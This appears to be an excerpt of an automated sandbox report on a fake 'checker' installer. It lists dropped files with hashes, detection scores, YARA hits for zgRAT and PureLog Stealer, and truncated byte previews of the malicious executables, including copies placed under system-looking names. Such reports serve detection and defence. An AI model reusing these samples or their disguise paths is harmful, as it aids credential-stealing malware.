                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................5.........n.6.. ... 6...@.. .......................`6...........@................................. .6.K.... 6.p....................@6...................................................... ............... ..H............text...t.5.. ....5................. ..`.rsrc...p.... 6.......5.............@....reloc.......@6.......5.............@..B................P.6.....H...........D.......s...L...<,+...6......................................0..........(.... ........8........E....N...*...).......8I...(.... ....~....{....9....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E............R.......F...e...8........~....(f...~....(j... ....?*... ....~....{....9....& ....8....r...ps....z*8.... ........8z......... ....~....{....9d...& ....8Y...~....(^... .... .... ....s....~....(b..

                                                                                                                      C:\Program Files\Windows NT\Accessories\en-GB\98135c31e34d63

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):309
                                                                                                                      Entropy (8bit):5.747802276786102
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:UJknM9EMFiH02RsmUDPxlpwBk52IA10no4rrsugAI0:UJxCA+04sPDfeBS7A+o4/s3Ab
                                                                                                                      MD5:F87A394D5AF33C43D669075035BC58E2
                                                                                                                      SHA1:1FB1D17998EA079AEAC52F5EE1DE6085DEF97382
                                                                                                                      SHA-256:6E08BEAE068CD02C17A650F108DF3C4197697C656088A7BCBC709A3E9EF62299
                                                                                                                      SHA-512:340FFA6C3D095C1464FC92C82E7B02985501CABA44D3CBB0B70D3FA5ABC684771FA073F7EF818745CD077B9298B450530217232CD79A9A4D41D028CE5CD815B8
                                                                                                                      Malicious:false
                                                                                                                      Preview:AxN0vxHfSU5VqEBqKZppagLwQbbU7oY9yrh9RhoIXzQbTEoSMIimnt2elbjUWxin56h9gBYmvgSlQtcLwIIyGwVEzDX08TwkQmgXhpwKu51GaRN28XhNpthIkcJcoiobusUoMFoHV7EK5Ooi0f1kwi5hEXwEfUgLRZWs6jq3tZ1rpXNWyklIqDoLxxjyTjmBa22f15lRy81XrN1rKZQ4sXeOuL5J92jJx0Qxese39UUsMRej51o3TrTDXouqAcR6Zrj07ENc5W5XDwBcrWNIOpzGhNZz7x3hDXTfrnm1oL76v59kmR8nO

                                                                                                                      C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3538432
                                                                                                                      Entropy (8bit):7.811102685383502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
                                                                                                                      MD5:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      SHA1:AD784AF316C9674AB5963D9F3144EAB1A41DA087
                                                                                                                      SHA-256:B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
                                                                                                                      SHA-512:EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................5.........n.6.. ... 6...@.. .......................`6...........@................................. .6.K.... 6.p....................@6...................................................... ............... ..H............text...t.5.. ....5................. ..`.rsrc...p.... 6.......5.............@....reloc.......@6.......5.............@..B................P.6.....H...........D.......s...L...<,+...6......................................0..........(.... ........8........E....N...*...).......8I...(.... ....~....{....9....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E............R.......F...e...8........~....(f...~....(j... ....?*... ....~....{....9....& ....8....r...ps....z*8.... ........8z......... ....~....{....9d...& ....8Y...~....(^... .... .... ....s....~....(b..

                                                                                                                      C:\Users\Default\Favorites\6dd19aba3e2428

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with very long lines (654), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):654
                                                                                                                      Entropy (8bit):5.875502762551949
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6BDTiS670dnA/WGmoNn1ufWU7tEXFMsWMyD5bo0PrKt36J/iQBm9sJHUlg9T2:qPiS6cOWGvjGuX6fMk5TPWtdQceJHn9K
                                                                                                                      MD5:6C77E8F53162E45ADFE7FCB5B043C8E9
                                                                                                                      SHA1:864EA1FEC7815DEAAFD7D05B1D527B1813886A65
                                                                                                                      SHA-256:ACFED4161068F2B85CB0F0168652A208D4A44FE2589615685A67547519991F8A
                                                                                                                      SHA-512:8FB686BFDD0F08FC059F8B3AFD882298D2033D167F5378FDF8A22DD4FC8D4A0F5220476E35B63AF6ADABF9FCF8C11075EA44BC0DFE3E0E2438E612B0A62F604D
                                                                                                                      Malicious:false
                                                                                                                      Preview:XfIdYUpdguEtWdCs3UmNyMpyPS4pknOT2NRqzcWkUHGg441ppA8JrgzKzTOFa932gu1JMV2a8B2rGI4VbO9jpFmWXG0gOQKUONAKCsdUIhLqnHErY3oLATNbIfvFeWMr0id2IuSsvpbH45sQCJHUm9U4AiBh7XzvVdzEoLjok5aV2FhMwfDVO1E1Oi2jsvvXzpwaGnl0jdtqi8C4BzucUdheY80FTA6zKCfMTHFI3MvvHYSPg7h2ATDVISBHxfgjg4gfdzl4tmiHsvWApljWcEz19JEBF8VXpMON2wvqVnIXu6nW5BcM5KHcEpgTukyvQLbfhJI3z2Ay5bHDfsGEfJbfEwIMQc5vyWGjeHzv2iXCKSgmhcxCeuPHt6buB5mW7O9iUhiY3UL7vYUwPfoxo3REG80iqEu75AF5T8RA3ZJJiSWUlpffQzsE74bVrAryjOBvTZcRNo3OtHgymf7BjPqGRB8Yg6S3rUkTRkALMNRl5dUzYntLDqOUi4dRaEvRW9gYhNgBevzW7EKxrJ92MG0BFPuWHtvHcAO675RLGrrS12XdupkRE2EQJfTScK4vAr370O0v1yvfZiKN2RlbIdDj58wbm9t6w5RJ9angzyaPGi1lUFaKicmgoUB1bYJ2FztdQANboFmUDx

                                                                                                                      C:\Users\Default\Favorites\ApplicationFrameHost.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3538432
                                                                                                                      Entropy (8bit):7.811102685383502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
                                                                                                                      MD5:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      SHA1:AD784AF316C9674AB5963D9F3144EAB1A41DA087
                                                                                                                      SHA-256:B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
                                                                                                                      SHA-512:EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................5.........n.6.. ... 6...@.. .......................`6...........@................................. .6.K.... 6.p....................@6...................................................... ............... ..H............text...t.5.. ....5................. ..`.rsrc...p.... 6.......5.............@....reloc.......@6.......5.............@..B................P.6.....H...........D.......s...L...<,+...6......................................0..........(.... ........8........E....N...*...).......8I...(.... ....~....{....9....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E............R.......F...e...8........~....(f...~....(j... ....?*... ....~....{....9....& ....8....r...ps....z*8.... ........8z......... ....~....{....9d...& ....8Y...~....(^... .... .... ....s....~....(b..

                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):71954
                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                      Malicious:false
                                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):328
                                                                                                                      Entropy (8bit):3.144086598890895
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:kKGi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:GDnLNkPlE99SNxAhUe/3
                                                                                                                      MD5:48759AB393F88CA7D1DDEB952DE1BD9A
                                                                                                                      SHA1:AE868808C6AB3EEC6FBD967D344A158F390BF1D9
                                                                                                                      SHA-256:1002DF48FC02F1E1FCCA372AF80783AB815C8873F1A155741ACF87B7DA1725D5
                                                                                                                      SHA-512:72845BD86CD13E059AD6A43BCD3D9B825F64FB9FC0540FA5600B3150FB814FF13229171E0A3C4886BF7F54D43F7357E39C6C7CBA0018C034A332B1628B0476D4
                                                                                                                      Malicious:false
                                                                                                                      Preview:p...... ...........>}I..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KAdpNCgonFhCnlBRasdZerWl.exe.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:CSV text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):847
                                                                                                                      Entropy (8bit):5.354334472896228
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                      MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                      SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                      SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                      SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                      Malicious:false
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\webDriverintoDll.exe.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1915
                                                                                                                      Entropy (8bit):5.363869398054153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                                                      MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                                                      SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                                                      SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                                                      SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                                                      Malicious:false
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                                                      C:\Users\user\AppData\Local\Temp\1uXHZw21VW

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\2V2U3XkFWy

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25
                                                                                                                      Entropy (8bit):4.323856189774724
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:QLYYzUkcun:2hzvcun
                                                                                                                      MD5:1FAC1152A8BD4CEE39D7005406DE9DD4
                                                                                                                      SHA1:8FE37DDABD351856ACD399F39EEA3146FC4BD9CC
                                                                                                                      SHA-256:07D23C1EDCEF3BAA06370F07E437B02DE1201376191D6441088FCF662E1CDEFA
                                                                                                                      SHA-512:C1CA290AC1E412A12A7FD8AB952AD4B4A0480B1509B7202FD1927BA81F25D8062720B3C22D7A2412AF5F2B27EB30CF22B0E519513B22D7BE16E06229EE2F19B7
                                                                                                                      Malicious:false
                                                                                                                      Preview:OrTRsYwwocMtXka5qbI11X65K

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\New

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):2.9169468593135157
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+f+OFx/DgstjfDaf///////aorGbaX8PSccl1q12xfnW1orsKc:+WqDgOQ///////aoZsP+/qAVnWursKc
                                                                                                                      MD5:1E80DE80CEFEE55D7CFDA0DF2EDCF3B2
                                                                                                                      SHA1:6E567D732354BBB21F9A57BBB72730C497F35380
                                                                                                                      SHA-256:4E64F4E40D8CBFF082B37186C831AF4B49E3131C62C00A0CF53E0A6E7E24AC2B
                                                                                                                      SHA-512:5EFEA023B18FFD5B87A19837BA2C72C179B55B7C3071B773A032C63D7268DBE25E2902AE8B111AD83A4F005346B378C7A75033ADAEE90805BCB4FEC2822E54C0
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):308536
                                                                                                                      Entropy (8bit):6.622627232444347
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:6yEEi+lMWuJ/nuQ+TDZCSl3F0P2W9LpAO2FoLXv7A+:hExMduJ/nF+ToSQc6LXvd
                                                                                                                      MD5:2B72B867CE06B51132AF8E6B5BD9C6D2
                                                                                                                      SHA1:48C12B24588A2513A847A9D934DFD88F22044F9A
                                                                                                                      SHA-256:42E4BA85C71A2C275D4682E3D137CEB5B1B9993541191176E71B2C9E98AE496D
                                                                                                                      SHA-512:00F47E884B0853029420D82368376548B02D77B2683D28A5420B6A5E5D764F1FB9121087EDFAD3A1BDCA0A21ED7BD47A47817CD153D0ABC1705A7643FB79BB6A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: 00onP4lQDK.exe, Detection: malicious, Browse
                                                                                                                      • Filename: Px0b16q72c.exe, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`8...V..V..V.OsU..V.OsS.;.V.#}R..V.#}U..V.#}S...V.OsR..V.OsP..V.OsW..V..W.K.V.E|_..V.E|V..V.E|...V.....V.E|T..V.Rich..V.................PE..L....!od.........."!...#.....l.......Y.......0............................................@.........................`@......pA.......p..x............x..8=.......*......p...................@...........@............0...............................text............................... ..`.rdata..>....0......................@..@.data........P.......8..............@....rsrc...x....p.......F..............@..@.reloc...*.......,...L..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\Up

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15086
                                                                                                                      Entropy (8bit):2.7901346596966383
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:+n5lkX/1//AJffffPTb6ylHJxnSfFN5pM2C:+5lkX/K
                                                                                                                      MD5:FD64F54DB4CBF736A6FC0D7049F5991E
                                                                                                                      SHA1:24D42FB471AAA7BCD54D7CCB36480F5ADD9B31D4
                                                                                                                      SHA-256:C269353D19D50E2688DB102FEF8226CA492DB17133043D7EB5420EE8542D571C
                                                                                                                      SHA-512:EC622AFAB084016F144864967A41D647E813282CB058F0F11E203865C0C175BA182E325A6D5164580FF00757C8475B61DE89CCC8E892E1B030E51B03AD4EAFB4
                                                                                                                      Malicious:false
                                                                                                                      Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\checkernewicon.jpg

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=3], baseline, precision 8, 512x512, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33060
                                                                                                                      Entropy (8bit):7.385353353756138
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:de5E/hgHgopL9b7MTaDRA1SsB0YZ/OMfxj0kSKmwfDiQjjWKIfU6WgKU:de5ysp6TwicsWkGKmwfDiQqKIfU/gKU
                                                                                                                      MD5:643516C9C88C63A4F6AC51E7E31413CC
                                                                                                                      SHA1:A6A1EBA4E9E0ABE410617C9FAAE5ECAD74A6179B
                                                                                                                      SHA-256:474629078C3E4C414EFF6FC939F9DEEA9CF7C7BE4C69B3ACC0B3F26BDF4ABA32
                                                                                                                      SHA-512:F8FE7B7CA669CBA87279EB40130F64C8F68592B400DDE2C4F8254C745A7A75397C3CEAA08B4A7A318F1540404EBA8F937B4F1A697F8BBE07F55D6ECE950E040C
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.............bExif..MM.*.............................J...........R.(..............................................http://ns.adobe.com/xap/1.0/.<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 12.40'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:format>image/png</dc:format>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:photoshop='http://ns.adobe.com/photoshop/1.0/'>. <photoshop:ColorMode>3</photoshop:ColorMode>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreateDate>2023-10-01T20:24:54+03:00</xmp:CreateDate>. <xmp:CreatorTool>Adobe Photoshop 24.4 (Windows)</xmp:CreatorTool>. <xmp:MetadataDate>2023-10-01T20:28:20+03:00</xmp:MetadataDate>. <xmp:ModifyDate>2023-10-01T20:28:20+03:00</xmp:ModifyDate>. </rdf:Description>.. <rdf:Description

                                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\checkernewicon.svg

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79519
                                                                                                                      Entropy (8bit):6.001179098064363
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:9RjTj2t+CE9CYbd8PKZQmLA3/h7HYL9CR3EvHp35jT371iQ6Zv6UD:DjBCAqEQAA3/ZvR3sVd3Q1Zh
                                                                                                                      MD5:E853D2085D300FD8E3D7FEDBCF53E060
                                                                                                                      SHA1:1B0897AA8492261E9015E75DAD6F7B3E21E00088
                                                                                                                      SHA-256:58F77E7DF8C274AEB0C7305A02397DC6C2E78FE0D4635F43D3A5634DEE27A9E0
                                                                                                                      SHA-512:229CE253FCD089B03E5700BC7292F9E673390FE0967FF5ABD4BC3646BD95002FA0326B05BC4F6CF7D9A73A718BB4A4CCD4E3321B6D3D42BA9B0F2FF0BBDED5CF
                                                                                                                      Malicious:false
